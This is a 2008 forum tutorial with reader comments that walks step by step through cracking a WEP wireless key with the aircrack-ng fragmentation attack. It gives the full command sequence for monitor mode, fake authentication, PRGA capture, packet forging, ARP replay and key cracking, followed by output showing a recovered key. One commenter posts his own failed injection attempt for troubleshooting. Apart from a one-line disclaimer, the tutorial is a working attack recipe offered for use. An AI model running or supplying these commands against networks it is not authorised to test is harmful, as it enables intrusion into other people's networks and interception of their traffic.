Finux's student hackers guide to WEP hacking
Submitted by finux on Sun, 08/10/2008 - 09:14.
Article Type:
Tutorial
Finux's student hackers guide to WEP hacking
As the growth of wireless networks grows, the question of wifi security needs a constant eye of caution, and periods of re-evaluation. Encryption of wireless networks is nothing new in today's world, however two main encryption methods are deployed in today's home networks, and large amount of business networks. It has come to light in recent years that the first major adopted wireless encryption technology used namely WEP (Wired Equivalency Privacy) has a mayor flaws and now calls for it to be totally depreciated are being heard loud and clear. It has to be said frankly that WEP can no longer be relied on to secure a network, in the past you may have been able to argue that there was some real-time deterrence from attack you would be hard pushed to make that argument today. With the increase in WEP decryption technologies, the reality of cracking the encryption is a short process with certain efficiency, rather than a time consuming laborious task.
However the true reality of inherent weakness found within the WEP protocol where long known before it's widespread deployment. The worrying aspect of cracking WEP today, is that it can be done in literally a minute. Scientists from the Darmstadt Technical University broke the record for cracking WEP in 2007, and this was due to them cutting the amount of encrypted packets that need to be captured to crack WEP. Before they broke the record you would need to capture anything between half a million encrypted packets, to 2 million, they managed to cut this drastically to 40 thousand packets.
The main attack that i'm going to focus on is the fragmentation attack, here is a quick description;
This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.
Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bytes of PRGA are obtained or sometimes less then 1500 bytes.
The original paper, The Fragmentation Attack in Practice, by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located here. Here are presentation slides of a related paper. A local copy of the slides is located here. Also see the paper “The Final Nail in WEP's Coffin” on this page.
http://www.aircrack-ng.org/doku.php?id=fragmentation#description
The attack is very easy in practice, and really can be broken down into 10 or so steps. I have used my eee loaded with Ubuntu 8.04, however you can use BackTrack 3 or any distro, and the packages you need to find should be pretty easy to be honest. Please only use this for educational purposes. Please don't use this to break the law.
I have just done this on my system so your wireless devices may differ to mine
Firstly declare run kismet or what ever wireless scanner your using and find the network your going to hack. You need to find out some key bits of information; namely the Wireless Networks name, the AP's MAC address and what channel it is on. So in my case i found;
Finux-Wireless-Network, channel 13, BSSID MAC address 00-14-7F-9D-51-11
so i would suggest that we declare some variables in the shell before we start so that we're not constantly re-typing them in
in a terminal type
export AP=(MAC ADDRESS OF AP WITHOUT BRACKETS)
export WIFI=(MAC ADDRESS OF YOUR WIRELESS CARD, ATH1 IN MY CASE)
So first command
sudo airmon-ng start wifi0
airmon-ng - bash script designed to turn wireless cards into monitor mode
sudo wlanconfig ath0 destroy
wlanconfig description
The current MadWifi driver supports multiple APs and concurrent AP/Station mode operation on the same device. The devices are restricted to using the same underlying hardware, thus are limited to coexisting on the same channel and using the same physical layer features. Each instance of an AP or station is called a Virtual AP (or VAP). Each VAP can be in either AP mode, Station Mode, "special" station mode, and Monitor mode. Every VAP has an associated underlying base device which is created when the driver is loaded.
sudo ifconfig ath1 up
sudo iwconfig ath1 mode monitor channel 13
This command puts your card into monitoring mode (rfmon) channel 13 (your channel may vary)
sudo aireplay-ng -1 0 -e Finux-Wireless-Network -a $AP -h $WIFI ath1
aireplay-ng injects specially generated ARP-request packets into an existing wireless network in order to generate traffic. By sending these ARP-request packets again and again, the target host will respond with encrypted replies, thus providing new and possibly weak IVs.
sudo aireplay-ng -5 -b $AP -h $WIFI ath1
This should produce a file in the directory your working in that should start fragment-*something*-*here*.xor
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment-*something*-*here*.xor
-w arp-request
packetforge-ng is a tool designed to forge ARP-request, UDP, ICMP or custom packets. You should find in file named arp-request was made in your working directory
sudo airodump-ng -c 13 --bssid $AP -w capture ath1
airodump-ng is a packet capture tool for aircrack-ng. It allows dumping packets directly from WLAN interface and saving them to a pcap or IVs file.
You will need to open another terminal and leave airodump-ng running, in the new terminal
sudo aireplay-ng -2 -r arp-request ath1
This uses the crafted arp-request we made with packetforge-ng, you will need to leave this running and open a new terminal
sudo aircrack-ng -z *.cap -z
aircrack-ng is a 802.11 WEP / WPA-PSK key cracker. It implements the so-called Fluhrer - Mantin - Shamir (FMS) attack, along with some new attacks by a talented hacker named KoreK. When enough encrypted packets have been gathered, aircrack-ng can almost instantly recover the WEP key.
This command will pull everything in you working directory that ends .cap and start cracking the wep key. You should get a window like this
Aircrack-ng 1.0 beta1
[00:03:58] Tested 793 keys (got 47545 IVs)
KB depth byte(vote)
0 4/ 5 7E(55296) 01(54528) B5(54528) 3C(53760) B9(53760)
1 4/ 1 46(54528) 2D(54016) A8(53504) D3(53504) DD(53248)
2 1/ 7 AE(57088) 66(55552) 98(55552) A5(55552) 01(55040)
3 18/ 3 F8(53248) 36(52992) 4D(52992) 9C(52736) E7(52736)
4 0/ 1 B9(69120) 4B(56832) 5B(56576) 16(56064) D0(55040)
KEY FOUND! [ 73:4F:39:51:6D:58:69:6E:77:2C:64:6D:21 ] (ASCII: sO9QmXinw,dm! )
Decrypted correctly: 100%
And that's wep hacked in less than five minutes with no clients attached to the network
~~~~~~~~~~
URL's Interesting Bit's
~~~~~~~~~~
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
http://www.offensive-security.com/movies/frag-final/frag-final.html
http://wireless-comm.blogspot.com/2008/05/10-easy-steps-to-crack-wireles...
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,18...
http://forums.remote-exploit.org/showthread.php?t=8339
http://www.informit.com/guides/content.aspx?g=security&seqNum=305&f1=rss
http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
http://ubuntuforums.org/showthread.php?t=763911
http://forums.remote-exploit.org/showthread.php?t=9457
http://oxid.netsons.org/phpBB2/viewtopic.php?t=2301&start=0&postdays=0&p...
http://www.youtube.com/results?search_query=wep+fragmentation+attack&sea...
http://www.eweek.com/c/a/Mobile-and-Wireless/The-Final-Final-Nail-in-WEP...
http://www.thelinuxsociety.org.uk/content/finuxs-student-hackers-guide-t...
Thanks for posting this up
Thanks for posting this up Finux. Can't wait to listen to the HPR episode!Chad
np
My pleasure dude Finux http://www.thelinuxsociety.org.uk
here's the hpr episode
Here's the link, for Hacker Public Raadio episode http://www.hackerpublicradio.org/eps/hpr0161.mp3 Finux http://www.thelinuxsociety.org.uk
Glad I saw this
A freind of mine recently had their network encypted by comcast and I'm pretty sure it is WEP, I think a change is instore.Finux your the man, thanks.-gilbert
trouble
Not sure where to put this in the forms, so I put it hear ill move it if i need toI cant seem to get past the initial attempt to inject packets. I'm using an rt73 serial monkey drivers on an EDIMAX EW-7318USg. I have done some searching for the errors that ive gotten but to no advaile. The drivers readme says packet injection is supported but i may just be doing something wrong there is what i have so far
sudo airmon-ng start wifi0 #works finesudo wlanconfig rausb0 destroy #get the error belowwlanconfig: ioctl: Operation not supportedsudo iwpriv wlan0 rfmontx 1 #allows injection according to the info on the drivers readmesudo iwconfig rausb0 mode monitor channel 6 #no errorssudo aireplay-ng -1 0 -e INTEL_wireless -a $AP -h $WIFI rausb0 #you see out put below17:41:26 Waiting for beacon frame (BSSID: MAC) #changed for privacy17:41:26 Sending Authentication RequestAttack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled.* Check that the BSSID (-a option) is correct.* Try to change the number of packets (-o option).* The driver/card doesn't support injection.* This attack sometimes fails against some APs.* The card is not on the same channel as the AP.* You're too far from the AP. Get closer, or lower the transmit rate.Thanks in advance-Gilbert